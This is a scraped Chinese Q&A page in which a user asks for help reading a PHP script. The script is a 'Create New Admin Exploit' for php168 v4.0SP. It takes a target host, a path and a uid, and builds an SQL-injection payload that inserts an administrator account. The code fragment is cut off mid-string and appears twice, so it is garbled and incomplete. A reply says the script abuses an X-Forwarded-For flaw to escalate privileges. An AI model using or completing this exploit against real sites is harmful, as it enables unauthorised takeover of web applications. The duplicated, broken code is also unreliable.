UC知道帮忙读个php脚本文件
来源:百度知道 编辑:UC知道 时间:2024/05/26 00:48:41
<?php
print_r("
+------------------------------------------------------------------+
Create New Admin Exploit FOR php168 v4.0SP
BY Flyh4t
+------------------------------------------------------------------+
");
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path uid\n";
echo "host: target server \n";
echo "path: path to php168\n";
echo "uid: the lastest uid\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost / 120\n";
die;
}
$host=$argv[1];
$path=$argv[2];
$id=$argv[3]+2;
$cmd = "xxxx','0','111','0','1','', '', '123', '123', '123', '123', '0', '', '0', '', '', '', ''),('&q
print_r("
+------------------------------------------------------------------+
Create New Admin Exploit FOR php168 v4.0SP
BY Flyh4t
+------------------------------------------------------------------+
");
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path uid\n";
echo "host: target server \n";
echo "path: path to php168\n";
echo "uid: the lastest uid\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost / 120\n";
die;
}
$host=$argv[1];
$path=$argv[2];
$id=$argv[3]+2;
$cmd = "xxxx','0','111','0','1','', '', '123', '123', '123', '123', '0', '', '0', '', '', '', ''),('&q
晕!这段代码多敏感啊?
利用的PHP168 X-Forwarded-For的漏洞。
fsockopen多数网站是不开的。
具体的我无法给你翻译
简单说就是通过连接非法提升权限
楼主你想怎样
你不懂什么说清楚啦..
我怎么知道你想怎样.